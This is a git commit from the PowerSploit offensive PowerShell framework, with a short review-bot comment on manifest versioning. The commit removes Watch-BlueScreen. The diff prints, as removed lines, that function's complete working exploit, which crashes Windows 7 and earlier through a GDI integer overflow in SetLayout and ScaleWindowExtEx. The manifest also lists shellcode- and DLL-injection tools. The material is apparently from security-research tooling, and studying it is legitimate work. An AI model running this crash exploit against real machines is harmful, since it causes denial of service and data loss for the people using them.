Removing Watch-BlueScreen

This vulnerability was patched a while ago, making this function largely
irrelevant.
This commit is contained in:
mattifestation 2014-06-19 20:16:26 -04:00
parent 3444a0700e
commit 80ffa19fa3
3 changed files with 1 additions and 83 deletions


@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
# List of all files packaged with this module # List of all files packaged with this module
FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md' 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Usage.md'
# Private data to pass to the module specified in RootModule/ModuleToProcess # Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = '' # PrivateData = ''
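Review bot: The FileList edit drops a shipped script while the ModuleVersion shown in the hunk header context (`ModuleVersion = '1.0.0.0'` in the ModuleList entry for this same module) is left unchanged, so consumers pinning that version would receive a different file set under the same version number; if that entry is the module's own version, a bump belongs in this commit. If the manifest also declares an export list (FunctionsToExport or similar) outside this hunk, it should be checked for a lingering Watch-BlueScreen entry, since a stale export name would fail at import time rather than at edit time. The FileList assignment continues onto the next line but is otherwise fully inside the hunk.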


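--- a/Watch-BlueScreen.ps1
+++ b/Watch-BlueScreen.ps1
@@ -1,78 +0,0 @@
-function Watch-BlueScreen
-{
-<#
-.SYNOPSIS
-Cause a blue screen to occur (Windows 7 and below).
-PowerSploit Function: Watch-BlueScreen
-Author: Matthew Graeber (@mattifestation)
-Original Research: Tavis Ormandy and Nikita Tarakanov
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-.NOTES
-Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
-?tweeted this technique on 5/13/2013.
-.LINK
-https://gist.github.com/taviso/4658638
-http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
-https://twitter.com/NTarakanov/status/334031968465453057
-#>
-[CmdletBinding( ConfirmImpact = 'High')] Param ()
-try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
-{
-$DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
-$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
-$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
-$TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
-$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
-$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
-$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
-[Reflection.FieldInfo[]]@($SetLastError), @($true))
-$TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
-'Gdi32.dll',
-'Public, Static',
-'Standard',
-[IntPtr],
-@([IntPtr]),
-'Winapi',
-'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
-$TypeBuilder.DefinePInvokeMethod( 'SetLayout',
-'Gdi32.dll',
-'Public, Static',
-'Standard',
-[UInt32],
-@([IntPtr], [UInt32]),
-'Winapi',
-'Auto' ) | Out-Null
-$TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
-'Gdi32.dll',
-'Public, Static',
-'Standard',
-[Bool],
-@([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
-'Winapi',
-'Auto' ) | Out-Null
-$Gdi32 = $TypeBuilder.CreateType()
-}
-$LAYOUT_RTL = 1
-if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' ))
-{
-$DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
-$Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
-$Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
-}
-}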


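--- a/Usage.md
+++ b/Usage.md
@@ -20,10 +20,6 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
 Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
-#### `Watch-BlueScreen`
-Cause a blue screen to occur (Windows 7 and below).
 ## ScriptModification
 **Modify and/or prepare scripts for execution on a compromised machine.**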